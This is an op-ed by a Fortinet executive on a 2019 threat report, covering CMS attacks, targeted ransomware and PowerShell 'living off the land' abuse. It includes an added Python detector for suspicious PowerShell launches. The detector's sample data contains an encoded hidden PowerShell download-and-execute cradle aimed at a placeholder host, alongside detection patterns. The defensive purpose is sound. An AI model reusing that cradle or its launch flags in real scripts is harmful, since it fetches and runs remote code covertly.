New global threat report underscores importance of refreshing cyber hygiene
By Derek Manky
Earlier this year, the Canadian Centre for Cyber Security predicted that 2019 would offer little respite when it came to cyber threats.
Unfortunately, the centre has yet to be proven wrong. That report answered the question of “what” when it comes to security trends, including theft of personal information, malicious online influence activity and even potential damage to infrastructure.
Now, as we approach the halfway mark of the year, we’re beginning to get a clearer picture of the “how.”
This month Fortinet released its latest quarterly global Threat Landscape Report, which takes stock of billions of live threat events, collected from millions of devices throughout the first quarter of 2019, and analyzed by our FortiGuard Labs team. At its core, the report is meant to answer the simple question of, “is it getting better or worse out there?” While the answer is complicated, the bottom line is this: while the global threat landscape has eased slightly since hitting a peak in December 2018, it remains higher than when the Threat Landscape Index (TLI) report series was first launched, and also shows somewhat more volatility.
Given the sheer amount of activity collected each quarter, identifying the most critical trends is no small challenge. After careful analysis, we believe the following risk factors are among those that Canadian businesses should have high on their radar.
Keep a close eye on content management
The popularity of social media continues to play a critical role in the lives of individuals. From a security perspective, personally identifiable information collected from social media sites is often used by cybercriminals for phishing and spearphishing attacks. However, as organizations race to create social-savvy websites that enable them to compete more effectively in the social media and larger digital marketplace, they are leveraging content management systems (CMS) and related development frameworks that are also vulnerable.
Like any technology on the upswing, these sites are attracting the attention of cybercriminals in search of opportunity. While WordPress continues to be targeted, attacks have begun to move to lesser-known CMS systems. Attacks can range from simply vandalizing a website and impacting a company’s brand and reputation; to executing a DDoS attack; to stealing or compromising mailing lists, forums, media galleries, and online stores and shopping carts; to using a compromised website as a launching pad to attack internal network resources or infect visitors to the site.
The takeaway for Canadian businesses is clear. As the popularity of CMS sites grows, so too do their risks. Don’t let minor CMS or third-party plugins end up being the weak spot in your defenses.
Ransomware is far from gone
Ransomware has become a regular feature of the threat landscape. It’s also evolving, and the TLI shows a clear trend toward threat actors using it for more targeted, and potentially lucrative, campaigns.
Multiple attacks during Q1 demonstrate that ransomware is increasingly being customized for high-value targets, often to provide the attacker with privileged access to the network, thereby increasing the impact of an infection. LockerGoga is an example of a recent attack conducted in multiple stages, the first being a thorough reconnaissance of the defenses in place at the sites it targeted. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, the samples analyzed showed very little of it. This not only confirms the targeted nature of the attack, but also that the attackers were able to determine in advance that obfuscation and evasion techniques were unnecessary, because the malware would not be easily detected by the defenses already in place.
LockerGoga is hardly the only ransomware variant that was active in Q1. It’s critical that businesses take steps to protect against ransomware by ensuring consistent patching and backup priorities are maintained, including storing backups off-network and regularly testing them for malware. Companies should also begin to consider strategies for addressing tailored and targeted ransomware threats before they strike.
Attackers are comfortable “living off the land”
Security risks are often associated with unauthorized downloads of malware or other tools from outside the network that then drive an attack. However, the report has found that attackers are increasingly using tools already pre-installed on targeted systems to carry out their activities. This is known as “living off the land,” and enables hackers to hide their attacks behind what appears to be normal, everyday processes, making them more challenging to identify. And because many of these tools include privileged access, they can also be harder to stop.
PowerShell is arguably one of the most popular tools used by IT teams for many reasons. It comes pre-installed on Windows machines and can interact directly with the .NET Framework. It has also become quite popular among cybercriminals. We’ve tracked adversaries using PowerShell in campaigns to deploy numerous malware, including TrickBot and Emotet banking Trojans. PowerShell, of course, is not the only one. There are other popular utilities that enable attackers to escalate privileges, move laterally across an environment, and install malicious payloads on other systems.
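To show why living-off-the-land activity is harder to spot, here is an added example (not code from the report or from Fortinet) of triage logic for PowerShell process-creation events: it decodes -EncodedCommand arguments and requires two independent signals before flagging anything, so routine administrative use is left alone. The sample events, patterns and threshold are constructed assumptions, not real telemetry.

```python
import base64
import re

# Heuristics for PowerShell process-creation telemetry (Sysmon Event ID 1 or Windows
# 4688 with command-line logging). These patterns are assumptions of this added example.
SUSPICIOUS_FLAGS = {
    r"-e(c|nc|ncodedcommand)?\b": "encoded command",
    r"-w(indowstyle)?\s+hidden": "hidden window",
    r"-(ep|executionpolicy)\s+bypass": "execution policy bypass",
    r"-nop\b|-noprofile\b": "profile suppressed",
}
CRADLE_PATTERNS = [r"\biex\b", r"invoke-expression", r"downloadstring", r"invoke-webrequest"]
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# Constructed sample events (not real telemetry): a scheduled admin script, an interactive
# admin command, and an Office-spawned launch whose -EncodedCommand (base64 of UTF-16LE) hides a cradle.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\rotate-logs.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + ENCODED},
]

def decode_encoded_command(cmdline: str):
    # Plaintext of an -EncodedCommand argument, or None if absent or undecodable.
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict) -> dict:
    # Collect reasons an event looks like living-off-the-land use of PowerShell.
    cmd = event["CommandLine"]
    reasons = [label for pat, label in SUSPICIOUS_FLAGS.items() if re.search(pat, cmd, re.I)]
    decoded = decode_encoded_command(cmd)
    # Match cradle patterns on the decoded script as well as the raw command line.
    if any(re.search(p, cmd + " " + (decoded or ""), re.I) for p in CRADLE_PATTERNS):
        reasons.append("download/execution cradle")
    if event["ParentImage"].rsplit("\\", 1)[-1].lower() in OFFICE_PARENTS:
        reasons.append("spawned by Office application")
    # One flag alone is everyday admin practice; require two independent signals.
    return {"flagged": len(reasons) >= 2, "reasons": reasons, "decoded": decoded}
```

Running score_event over SAMPLE_EVENTS flags only the Office-spawned event; the -NoProfile admin command collects one reason and stays below the threshold, which is the tuning point that keeps such a rule usable.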
What you can do
Those of us tasked with defending networks also know that the threat landscape is always shifting. That is why one of the most important things any IT team can do is remain aware of the latest cyberthreat trends and targets. The report not only identifies the threats listed above, but also documents many other threat trends. And because cyberattacks tend to occur in clusters, it is critical that resources be directed at the systems and functions currently being targeted by cybercriminals.
The second is to reprioritize basic cyber hygiene practices. Zero-day attacks are rare because they are difficult to develop. Attackers more often target known vulnerabilities, which means that a large share of attacks exploit vulnerabilities for which a patch was already available. Addressing this requires identifying all assets on your network, patching those with vulnerabilities, replacing those that can no longer be updated, and segmenting those, like IoT devices, that can’t be easily patched.
Finally, organizations need to step back and rethink their security—especially if they have been engaged in digital transformation efforts. The first step is to identify and then engineer out as many points of weakness as possible. This includes a proactive inventory of devices, granular access control and dynamic network segmentation. Next, develop a proactive and integrated security approach that provides consistent protection across your entire distributed environment. In this way, you can better defend your entire network environment—from IoT devices and the mobile edge, through the network core and the new WAN edge, out to multi-cloud environments—at speed and scale.
As we saw at the start of the year, the threats are not likely to abate. Embracing an effective, long-term strategy that seeks to address security in an integrated and collaborative fashion is the most important step organizations can take to keeping adversaries at bay.
Derek Manky is chief, Security Insights & Global Threat Alliances at Fortinet, Office of CISO